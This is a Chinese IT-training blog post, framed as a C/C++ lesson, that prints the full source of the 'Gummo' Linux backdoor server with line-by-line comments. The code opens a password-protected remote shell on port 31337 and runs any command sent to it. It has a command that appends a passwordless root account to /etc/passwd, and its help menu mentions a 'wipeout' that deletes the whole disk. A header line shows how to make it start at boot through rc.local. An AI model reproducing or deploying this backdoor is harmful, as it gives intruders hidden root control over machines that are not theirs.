C/C++知识点之linux 后门程序
小标 2019-04-22 来源 : 阅读 1624 评论 0

摘要:本文主要向大家介绍了C/C++知识点之linux 后门程序,通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。

本文主要向大家介绍了C/C++知识点之linux 后门程序,通过具体的内容向大家展示,希望对大家学习C/C++知识点有所帮助。


  /*
  /* Gummo 后门服务器
  /* 编译: cc server.c -o server
  /* 使用: ./server &
  /* echo /tmp/server & >> /etc/rc.d/rc.local
   */

#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 31337
#define BACKLOG 5
#define CMD_LOG "/tmp/.cmd"
#define PASSWORD "password"

/* global */
int newfd;

void command ();

void
main ()
{

  int sockfd, sin_size, ss, len, bytes;

  struct sockaddr_in my_addr;
  struct sockaddr_in their_addr;

  char passwd[1024];
  char *prompt = "Password: ";
  char *gp;
  //创建一个套节字
  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror ("socket");
      exit (1);
    }
  my_addr.sin_family = AF_INET;
  my_addr.sin_port = htons (PORT);
  my_addr.sin_addr.s_addr = INADDR_ANY;
  bzero (&(my_addr.sin_zero), 8);
  //绑定端口
  if (bind (sockfd, (struct sockaddr *) &my_addr, sizeof (struct sockaddr)) \
      == -1)
    {
      perror ("bind");
      exit (1);
    }
   //接听
  if (listen (sockfd, BACKLOG) == -1)
    {
      perror ("listen");
      exit (1);
    }
  while (1)
    {
          ss = sizeof (struct sockaddr_in);
          //一直接收着 返回新的套节字
          if ((newfd = accept (sockfd, (struct sockaddr *) &their_addr, \
                   &sin_size)) == -1)
            {
              perror ("accept");
              exit (1);
            }
        //创建一个进程
        //子进程返回0 错误返回-1 父进程返回 pid
          if (fork ())
        {
///////////////////父进程中/////////////////////////
          len = strlen (prompt);
          //往新的套节字里发数据也就是往客服端发数据
          bytes = send (newfd, prompt, len, 0);
          //接收客服端的数据也就是密码
          recv (newfd, passwd, 1024, 0);
          //判断13首次出现位置
          if ((gp = strchr (passwd, 13)) != NULL)
            *(gp) = '\0';
          //密码正解
          if (!strcmp (passwd, PASSWORD))
            {
              //继续发给客服端
              send (newfd, "准许访问, HEH\n", 21, 0);
              send (newfd, "\n\n\n\n\n\n欢迎来到Gummo后门服务器!\n\n", 41, 0);
              send (newfd, "Type 'HELP' for a list of commands\n\n", 36, 0);
              //将处理所有发送的命令并将它们的输出发送给客户端
              command ();
            }
          //密码错误直接退出
          else if (passwd != PASSWORD)
            {
              send (newfd, "Authentification Failed! =/\n", 29, 0);
              close (newfd);
            }
        }
    }
}
//处理客服端的命令
void
command ()
{

  FILE *read;
  FILE *append;
  char cmd_dat[1024];
  char *cmd_relay;
  char *clean_log;
  char buf[5000];

  int dxm;

  while (1)
    {
          //先发送一个提示
          send (newfd, "command:~# ", 11, 0);
          //等待接收
          recv (newfd, cmd_dat, 1024, 0);
          cmd_dat[strlen (cmd_dat) - 2] = '\0';
          //判断命令是否为空
          if (strcmp (cmd_dat, ""))
        {
          //命令 HELP
          if ((strstr (cmd_dat, "HELP")) == cmd_dat)
            {
              //help
              send (newfd, "\n\n-=Help Menu=-\n", 16, 0);
              //quit
              send (newfd, "\nquit - to exit gummo backdoor\n", 31, 0);
              //rewt
              send (newfd, "rewt - automatically creates non passworded accnt 'rewt' uid0\n", 63, 0);
              //wipeout
              send (newfd, "wipeout - this feature rm -rf /'s a box. Inspired by dethcraze\n", 64, 0);
            }
           //quit
          if ((strstr (cmd_dat, "quit")) == cmd_dat)
            {
              close (newfd);
            }
           //rewt
          if ((strstr (cmd_dat, "rewt")) == cmd_dat)
            {
              system ("echo rewt::0:0::/:/bin/sh>>/etc/passwd;");
              send (newfd, "User 'rewt' added!\n", 19, 0);
            }
           //wipout
          if ((strstr (cmd_dat, "wipeout")) == cmd_dat)
            {
              send (newfd, "你尝试使用这个命令是不行的, HEH!\n", 54, 0);
              close(newfd);
                   exit(0);
            }
            else
            //搞一个临时文件保存命令字符串
            append = fopen (CMD_LOG, "w");
          fprintf (append, "dextro\n");
          fclose (append);

          //用于清理日志
          clean_log = (char *) malloc (420);
          sprintf (clean_log, "rm %s", CMD_LOG);
          system (clean_log);

          cmd_relay = (char *) malloc (1024);
          //用于输出重定向
          snprintf (cmd_relay, 1024, "%s > %s;\0", cmd_dat, CMD_LOG);
          system (cmd_relay);

          if ((read = fopen (CMD_LOG, "r")) == NULL)
            continue;
          while (!(feof (read)))
            {
              memset (buf, 0, 500);
              fgets (buf, 500, read);
              if (buf[0] == 0)
            break;
              write (newfd, buf, 500);
            }
          fclose (read);
        }
    }
}

   

本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标编程语言C/C+频道!

本文由 @小标 发布于职坐标。未经许可,禁止转载。
喜欢 | 1 不喜欢 | 0
看完这篇文章有何感觉?已经有1人表态,100%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved

208小时内训课程